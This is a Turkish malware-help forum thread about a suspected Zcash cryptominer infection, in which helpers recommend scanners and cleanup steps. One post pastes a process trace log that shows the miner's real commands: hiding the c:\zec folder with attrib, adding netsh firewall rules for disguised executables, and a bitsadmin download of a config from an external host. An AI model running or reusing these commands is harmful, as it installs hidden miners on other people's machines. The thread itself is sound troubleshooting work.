Türkçesever
Hectopat
- Katılım
- 12 Eylül 2016
- Mesajlar
- 630
Arkadaş Bitdefender Rescue Disk oluştursun ya da RKill ve sonrasında antivirüs kullansın. HerdProtect raporu oluşturmasında da fayda var.
Zcash Yeni Büyük Virüs Mü ?
- Konuyu başlatan KeremTK
- Başlangıç Tarihi
- Mesaj 75
- Görüntüleme 17B
KS
KS
KeremTK
Kilopat
- Katılım
- 8 Temmuz 2015
- Mesajlar
- 226
- Makaleler
- 2
- Çözümler
- 1
Daha fazla
- Cinsiyet
- Erkek
Saved date: 21.05.2017 01:00:54
Files detected: 0
Files scanned: 10.781
Processes scanned: 100
Modules scanned: 1.041
ASEPs scanned: 624
Downloads scanned: 2
Deep analysis: 9/0
---------------------------------------------------------------------------------
Files
Files detected: 0
Files scanned: 10.781
Processes scanned: 100
Modules scanned: 1.041
ASEPs scanned: 624
Downloads scanned: 2
Deep analysis: 9/0
---------------------------------------------------------------------------------
Files
Türkçesever
Hectopat
- Katılım
- 12 Eylül 2016
- Mesajlar
- 630
@KeremTK
Rapor temiz görünüyor. HerdProtect iyi bir güvenlik yazılımı değil galiba. Başka bir konuda da ufak tefek şeyler çıkartmıştı. Emsisoft Emergency Kit ile tarattık ve Win32/Sality çıktı işin içinden. 68 antivirüsle tarıyor bir de işin garibi.
Yapabilecekleriniz oldukça sınırlı. Avira yükleyeceksiniz, ayarlarını yapacaksınız ve tam tarama başlatacaksınız. Sistemi taratmadan önce RKill kullanılabilir. Ya da Kaspersky Rescue Disk, Avira Rescue System gibi araçlar ile kökten hâlletmeye bakacaksınız. Bir seçenek daha var, o da Norton Power Eraser.
HijackThis'in konusu var forumda. Ondan faydalanabilirsiniz. HitmanPro, Zemana Anti-Malware gibi yazılımlar da mevcut.
Rapor temiz görünüyor. HerdProtect iyi bir güvenlik yazılımı değil galiba. Başka bir konuda da ufak tefek şeyler çıkartmıştı. Emsisoft Emergency Kit ile tarattık ve Win32/Sality çıktı işin içinden. 68 antivirüsle tarıyor bir de işin garibi.
Yapabilecekleriniz oldukça sınırlı. Avira yükleyeceksiniz, ayarlarını yapacaksınız ve tam tarama başlatacaksınız. Sistemi taratmadan önce RKill kullanılabilir. Ya da Kaspersky Rescue Disk, Avira Rescue System gibi araçlar ile kökten hâlletmeye bakacaksınız. Bir seçenek daha var, o da Norton Power Eraser.
HijackThis'in konusu var forumda. Ondan faydalanabilirsiniz. HitmanPro, Zemana Anti-Malware gibi yazılımlar da mevcut.
Son düzenleme:
Türkçesever
Hectopat
- Katılım
- 12 Eylül 2016
- Mesajlar
- 630
RKill zararlıların görevini sonlandırarak güvenlik programlarının daha rahat çalışmasını sağlıyor.
Arkadaşlar hemen bir sürü AV veya güvenlik programları önermeyin. İlk olarak zararlının tanımlanması gerekli. Arkadaş birçok şeyi denemiş ve tanımlama yapamamış demek ki önerileriniz boşadır. Bu durumlarda AV veya güvenlik yazılımı önerilmez. Tanımlama ve inceleme yapılır.
İmzamdan sistem tarama 1 ve 2 sonucunu, ek olarak Farbar rehberini uygulayıp sonucunu paylaşın.
İmzamdan sistem tarama 1 ve 2 sonucunu, ek olarak Farbar rehberini uygulayıp sonucunu paylaşın.
KS
KS
KeremTK
Kilopat
- Katılım
- 8 Temmuz 2015
- Mesajlar
- 226
- Makaleler
- 2
- Çözümler
- 1
Daha fazla
- Cinsiyet
- Erkek
- attrib.exe
- netsh.exe
- bitsadmin.exe
Kod:
<Process Name="C:\Windows\System32\attrib.exe" PID="2832" StartedInTraceSec="47.907">
<StartTime>2017/05/20:14:10:25.6971698</StartTime>
<CommandLine><![CDATA[attrib +s +a +h c:\zec]]></CommandLine>
<DiskUsage Units="bytes">54784</DiskUsage>
<CpuUsage Units="us">0</CpuUsage>
<ParentPID>7252</ParentPID>
<ParentStartTime>2017/05/20:14:10:19.4315463</ParentStartTime>
<ParentName>cmd.exe</ParentName>
</Process>
<StartTime>2017/05/20:14:10:19.4315463</StartTime>
<CommandLine><![CDATA[C:\Windows\system32\cmd.exe /c c:\zec\start.bat]]></CommandLine>
<DiskUsage Units="bytes">0</DiskUsage>
<CpuUsage Units="us">30589</CpuUsage>
<ParentPID>5712</ParentPID>
<ParentStartTime>2017/05/20:14:10:03.9668622</ParentStartTime>
<ParentName>nircmd.exe</ParentName>
</Process>
<Process Name="C:\Windows\System32\cmd.exe" PID="7252" StartedInTraceSec="41.642">
<Process Name="C:\Windows\System32\conhost.exe" PID="7364" StartedInTraceSec="41.926">
<StartTime>2017/05/20:14:10:19.7159901</StartTime>
<CommandLine><![CDATA[\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1]]></CommandLine>
<DiskUsage Units="bytes">4096</DiskUsage>
<CpuUsage Units="us">18788</CpuUsage>
<ParentPID>7252</ParentPID>
<ParentStartTime>2017/05/20:14:10:19.4315463</ParentStartTime>
<ParentName>cmd.exe</ParentName>
</Process>
<Process Name="C:\Windows\System32\conhost.exe" PID="9196" StartedInTraceSec="56.451">
<StartTime>2017/05/20:14:10:34.2408881</StartTime>
<CommandLine><![CDATA[\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1]]></CommandLine>
<DiskUsage Units="bytes">0</DiskUsage>
<CpuUsage Units="us">33777</CpuUsage>
<ParentPID>9188</ParentPID>
<ParentStartTime>2017/05/20:14:10:34.1200329</ParentStartTime>
<ParentName>OAWrapper.exe</ParentName>
</Process>
<Process Name="C:\Windows\System32\attrib.exe" PID="7308" StartedInTraceSec="50.710">
<StartTime>2017/05/20:14:10:28.4999577</StartTime>
<CommandLine><![CDATA[attrib +s +a +h c:\zec\*]]></CommandLine>
<DiskUsage Units="bytes">0</DiskUsage>
<CpuUsage Units="us">5558</CpuUsage>
<ParentPID>7252</ParentPID>
<ParentStartTime>2017/05/20:14:10:19.4315463</ParentStartTime>
<ParentName>cmd.exe</ParentName>
</Process>
<Process Name="C:\Windows\System32\netsh.exe" PID="7384" StartedInTraceSec="64.034">
<StartTime>2017/05/20:14:10:41.8241590</StartTime>
<CommandLine><![CDATA[netsh advfirewall firewall add rule name="WePrint" dir=in action=allow profile=any description="WePrint Firewall Exception" program="C:\zec\taskmgr.exe"]]></CommandLine>
<DiskUsage Units="bytes">611328</DiskUsage>
<CpuUsage Units="us">6175</CpuUsage>
<ParentPID>7252</ParentPID>
<ParentStartTime>2017/05/20:14:10:19.4315463</ParentStartTime>
<ParentName>cmd.exe</ParentName>
</Process>
<Process Name="C:\Windows\System32\netsh.exe" PID="8928" StartedInTraceSec="65.598">
<StartTime>2017/05/20:14:10:43.3880496</StartTime>
<CommandLine><![CDATA[netsh advfirewall firewall add rule name="WePrint" dir=out action=allow profile=any description="WePrint Firewall Exception" program="C:\zec\svchosts.exe"]]></CommandLine>
<DiskUsage Units="bytes">0</DiskUsage>
<CpuUsage Units="us">3033</CpuUsage>
<ParentPID>7252</ParentPID>
<ParentStartTime>2017/05/20:14:10:19.4315463</ParentStartTime>
<ParentName>cmd.exe</ParentName>
</Process>
<Process Name="C:\Windows\System32\bitsadmin.exe" PID="8536" StartedInTraceSec="69.697">
<StartTime>2017/05/20:14:10:47.4872436</StartTime>
<CommandLine><![CDATA[Bitsadmin.exe /transfer "MyZec" http://guardia.us/MyZec.txt C:\zec\config.txt]]></CommandLine>
<DiskUsage Units="bytes">0</DiskUsage>
<CpuUsage Units="us">7057</CpuUsage>
<ParentPID>7252</ParentPID>
<ParentStartTime>2017/05/20:14:10:19.4315463</ParentStartTime>
<ParentName>cmd.exe</ParentName>
</Process>Sistem loglarında program bu şekilde başlatılıp aktif ediliyor.
Son düzenleyen: Moderatör:
Türkçesever
Hectopat
- Katılım
- 12 Eylül 2016
- Mesajlar
- 630
KS
KS
KeremTK
Kilopat
- Katılım
- 8 Temmuz 2015
- Mesajlar
- 226
- Makaleler
- 2
- Çözümler
- 1
Daha fazla
- Cinsiyet
- Erkek
Bunlar ne yaptıklarının farkında değiller. Bitcoin kazandıklarını zannediyorlar ancak hem terörizm hemde siyasi işler için bilgisayarları bu insanlar malzeme yapıyor.
İndir TEST zip
İndir TEST zip
Sistem tarama 1 olanı sadece vermişsiniz. Diğerlerini de paylaşın.
Şuan yüklü halde olan güvenlik araçlarınızı yazayım:
Bitdefender Antivirus Free
Dr.Web
Norton Security
Malwarebytes
RogueKiller version 12.10.9.0
Bir sistemde bu kadar aktif koruma olmaz olursa hem kasma yaşarsın, hem hiçbiri doğru çalışmaz. Hemde virüs olmayanı virüs, virüsü de zararsız görmeye başlar.
Hepsini kaldırın.
Ek olarak bunları da denetim masasından kaldır;
Adobe Flash Player 25 NPAPI
Adobe Flash Player 25 PPAPI
Adobe AIR
bl
Java 7 Update 79 (64-bit)
ph
BIOS'un güncel değil gibi 22.4 olarak gözüküyor yüklü sürümün, anakart modelini belirt veya imzamdan Aida64 sonucunu da paylaşın diğer istediğim sonuçlarla beraber.
Bu dosyaları güvenli moda girip silin:
C:\Windows\SYSTEM32\nircmd.exe
Bu klasör içine gir ve içindekileri temizle:
c:\zec\
Şuan yüklü halde olan güvenlik araçlarınızı yazayım:
Bitdefender Antivirus Free
Dr.Web
Norton Security
Malwarebytes
RogueKiller version 12.10.9.0
Bir sistemde bu kadar aktif koruma olmaz olursa hem kasma yaşarsın, hem hiçbiri doğru çalışmaz. Hemde virüs olmayanı virüs, virüsü de zararsız görmeye başlar.
Hepsini kaldırın.
Ek olarak bunları da denetim masasından kaldır;
Adobe Flash Player 25 NPAPI
Adobe Flash Player 25 PPAPI
Adobe AIR
bl
Java 7 Update 79 (64-bit)
ph
BIOS'un güncel değil gibi 22.4 olarak gözüküyor yüklü sürümün, anakart modelini belirt veya imzamdan Aida64 sonucunu da paylaşın diğer istediğim sonuçlarla beraber.
Bu dosyaları güvenli moda girip silin:
C:\Windows\SYSTEM32\nircmd.exe
Bu klasör içine gir ve içindekileri temizle:
c:\zec\
Benzer konular
